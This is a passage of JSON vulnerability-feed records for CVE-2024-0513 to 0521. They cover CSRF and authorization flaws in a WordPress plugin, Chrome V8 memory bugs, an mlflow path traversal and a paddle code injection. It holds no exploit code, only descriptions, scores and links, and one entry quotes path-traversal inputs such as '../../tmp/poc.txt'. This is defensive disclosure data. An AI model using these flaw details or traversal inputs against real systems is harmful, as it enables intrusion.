"refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b2ff2954-f494-4cd7-9f29-ee0e8551e339?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b2ff2954-f494-4cd7-9f29-ee0e8551e339?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b2ff2954-f494-4cd7-9f29-ee0e8551e339?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b2ff2954-f494-4cd7-9f29-ee0e8551e339?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.87. This is due to missing or incorrect nonce validation on the add_to_wishlist function. This makes it possible for unauthenticated attackers to add items to user wishlists via a forged request granted they can trick a site administrator into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:royal-elementor-addons:royal_elementor_addons:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.3.88", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-02-29T01:43Z", "lastModifiedDate" : "2025-01-08T18:52Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0513", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-352" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/3d3516e7-cce4-4def-be38-d16be3110d59?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/3d3516e7-cce4-4def-be38-d16be3110d59?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/3d3516e7-cce4-4def-be38-d16be3110d59?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/3d3516e7-cce4-4def-be38-d16be3110d59?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.87. This is due to missing or incorrect nonce validation on the remove_from_wishlist function. This makes it possible for unauthenticated attackers to remove items from user wishlists via a forged request granted they can trick a site administrator into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:royal-elementor-addons:royal_elementor_addons:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.3.88", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-02-29T01:43Z", "lastModifiedDate" : "2025-01-08T18:58Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0514", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-352" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b0955689-43a0-442c-974b-5db5e4171f6a?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b0955689-43a0-442c-974b-5db5e4171f6a?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b0955689-43a0-442c-974b-5db5e4171f6a?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/b0955689-43a0-442c-974b-5db5e4171f6a?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.87. This is due to missing or incorrect nonce validation on the add_to_compare function. This makes it possible for unauthenticated attackers to add items to user compare lists via a forged request granted they can trick a site administrator into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:royal-elementor-addons:royal_elementor_addons:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.3.88", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-02-29T01:43Z", "lastModifiedDate" : "2025-01-08T18:59Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0515", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-352" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a4178271-c09e-4094-a616-5a00d28f39a3?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a4178271-c09e-4094-a616-5a00d28f39a3?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a4178271-c09e-4094-a616-5a00d28f39a3?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a4178271-c09e-4094-a616-5a00d28f39a3?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.87. This is due to missing or incorrect nonce validation on the remove_from_compare function. This makes it possible for unauthenticated attackers to remove items from user compare lists via a forged request granted they can trick a site administrator into performing an action such as clicking on a link." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:royal-elementor-addons:royal_elementor_addons:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.3.88", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-02-29T01:43Z", "lastModifiedDate" : "2025-01-08T19:02Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0516", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026824%40royal-elementor-addons%2Ftags%2F1.3.87&new=3032004%40royal-elementor-addons%2Ftags%2F1.3.88", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d3457b87-c860-4cf2-ac3d-2c6521b629ea?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d3457b87-c860-4cf2-ac3d-2c6521b629ea?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d3457b87-c860-4cf2-ac3d-2c6521b629ea?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/d3457b87-c860-4cf2-ac3d-2c6521b629ea?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to unauthorized post metadata update due to a missing capability check on the wpr_update_form_action_meta function in all versions up to, and including, 1.3.87. This makes it possible for unauthenticated attackers to update certain metadata." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:royal-elementor-addons:royal_elementor_addons:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.3.88", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-02-29T01:43Z", "lastModifiedDate" : "2025-01-08T19:06Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0517", "ASSIGNER" : "chrome-cve-admin@google.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_16.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_16.html", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_16.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_16.html", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://crbug.com/1515930", "name" : "https://crbug.com/1515930", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://crbug.com/1515930", "name" : "https://crbug.com/1515930", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IIUBRVICICWREJQUVT67RS7E4PVZQ5RS/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IIUBRVICICWREJQUVT67RS7E4PVZQ5RS/", "refsource" : "", "tags" : [ "Mailing List" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IIUBRVICICWREJQUVT67RS7E4PVZQ5RS/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IIUBRVICICWREJQUVT67RS7E4PVZQ5RS/", "refsource" : "", "tags" : [ "Mailing List" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TNN4SO5UI3U3Q6ASTVT6WMZ4723FYDLH/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TNN4SO5UI3U3Q6ASTVT6WMZ4723FYDLH/", "refsource" : "", "tags" : [ "Mailing List" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TNN4SO5UI3U3Q6ASTVT6WMZ4723FYDLH/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TNN4SO5UI3U3Q6ASTVT6WMZ4723FYDLH/", "refsource" : "", "tags" : [ "Mailing List" ] }, { "url" : "https://www.vicarius.io/vsociety/posts/out-of-bound-write-in-v8-javascript-engine-cve-2024-0517", "name" : "https://www.vicarius.io/vsociety/posts/out-of-bound-write-in-v8-javascript-engine-cve-2024-0517", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Out of bounds write in V8 in Google Chrome prior to 120.0.6099.224 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding" : "120.0.6099.224", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:38:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-16T22:15Z", "lastModifiedDate" : "2025-05-22T18:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0518", "ASSIGNER" : "chrome-cve-admin@google.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-843" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_16.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_16.html", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_16.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_16.html", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://crbug.com/1507412", "name" : "https://crbug.com/1507412", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://crbug.com/1507412", "name" : "https://crbug.com/1507412", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IIUBRVICICWREJQUVT67RS7E4PVZQ5RS/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IIUBRVICICWREJQUVT67RS7E4PVZQ5RS/", "refsource" : "", "tags" : [ "Mailing List" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IIUBRVICICWREJQUVT67RS7E4PVZQ5RS/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IIUBRVICICWREJQUVT67RS7E4PVZQ5RS/", "refsource" : "", "tags" : [ "Mailing List" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TNN4SO5UI3U3Q6ASTVT6WMZ4723FYDLH/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TNN4SO5UI3U3Q6ASTVT6WMZ4723FYDLH/", "refsource" : "", "tags" : [ "Mailing List" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TNN4SO5UI3U3Q6ASTVT6WMZ4723FYDLH/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TNN4SO5UI3U3Q6ASTVT6WMZ4723FYDLH/", "refsource" : "", "tags" : [ "Mailing List" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Type confusion in V8 in Google Chrome prior to 120.0.6099.224 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding" : "120.0.6099.224", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:38:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-16T22:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0519", "ASSIGNER" : "chrome-cve-admin@google.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_16.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_16.html", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_16.html", "name" : "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_16.html", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://crbug.com/1517354", "name" : "https://crbug.com/1517354", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://crbug.com/1517354", "name" : "https://crbug.com/1517354", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IIUBRVICICWREJQUVT67RS7E4PVZQ5RS/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IIUBRVICICWREJQUVT67RS7E4PVZQ5RS/", "refsource" : "", "tags" : [ "Mailing List" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IIUBRVICICWREJQUVT67RS7E4PVZQ5RS/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IIUBRVICICWREJQUVT67RS7E4PVZQ5RS/", "refsource" : "", "tags" : [ "Mailing List" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TNN4SO5UI3U3Q6ASTVT6WMZ4723FYDLH/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TNN4SO5UI3U3Q6ASTVT6WMZ4723FYDLH/", "refsource" : "", "tags" : [ "Mailing List" ] }, { "url" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TNN4SO5UI3U3Q6ASTVT6WMZ4723FYDLH/", "name" : "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TNN4SO5UI3U3Q6ASTVT6WMZ4723FYDLH/", "refsource" : "", "tags" : [ "Mailing List" ] }, { "url" : "https://www.couchbase.com/alerts/", "name" : "https://www.couchbase.com/alerts/", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.couchbase.com/alerts/", "name" : "https://www.couchbase.com/alerts/", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Out of bounds memory access in V8 in Google Chrome prior to 120.0.6099.224 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding" : "120.0.6099.224", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:38:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:fedoraproject:fedora:39:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:couchbase:couchbase_server:*:*:*:*:*:*:*:*", "versionEndExcluding" : "7.2.5", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-16T22:15Z", "lastModifiedDate" : "2024-12-20T19:01Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0520", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-22" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/mlflow/mlflow/commit/400c226953b4568f4361bc0a0c223511652c2b9d", "name" : "https://github.com/mlflow/mlflow/commit/400c226953b4568f4361bc0a0c223511652c2b9d", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://github.com/mlflow/mlflow/commit/400c226953b4568f4361bc0a0c223511652c2b9d", "name" : "https://github.com/mlflow/mlflow/commit/400c226953b4568f4361bc0a0c223511652c2b9d", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://huntr.com/bounties/93e470d7-b6f0-409b-af63-49d3e2a26dbc", "name" : "https://huntr.com/bounties/93e470d7-b6f0-409b-af63-49d3e2a26dbc", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ] }, { "url" : "https://huntr.com/bounties/93e470d7-b6f0-409b-af63-49d3e2a26dbc", "name" : "https://huntr.com/bounties/93e470d7-b6f0-409b-af63-49d3e2a26dbc", "refsource" : "", "tags" : [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability in mlflow/mlflow version 8.2.1 allows for remote code execution due to improper neutralization of special elements used in an OS command ('Command Injection') within the `mlflow.data.http_dataset_source.py` module. Specifically, when loading a dataset from a source URL with an HTTP scheme, the filename extracted from the `Content-Disposition` header or the URL path is used to generate the final file path without proper sanitization. This flaw enables an attacker to control the file path fully by utilizing path traversal or absolute path techniques, such as '../../tmp/poc.txt' or '/tmp/poc.txt', leading to arbitrary file write. Exploiting this vulnerability could allow a malicious user to execute commands on the vulnerable machine, potentially gaining access to data and model information. The issue is fixed in version 2.9.0." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.9.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-06-06T19:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0521", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-94" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://huntr.com/bounties/a569c64b-1e2b-4bed-a19f-47fd5a3da453", "name" : "https://huntr.com/bounties/a569c64b-1e2b-4bed-a19f-47fd5a3da453", "refsource" : "", "tags" : [ "Exploit", "Patch", "Third Party Advisory" ] }, { "url" : "https://huntr.com/bounties/a569c64b-1e2b-4bed-a19f-47fd5a3da453", "name" : "https://huntr.com/bounties/a569c64b-1e2b-4bed-a19f-47fd5a3da453", "refsource" : "", "tags" : [ "Exploit", "Patch", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Code Injection in paddlepaddle/paddle" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:paddlepaddle:paddle:*:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" 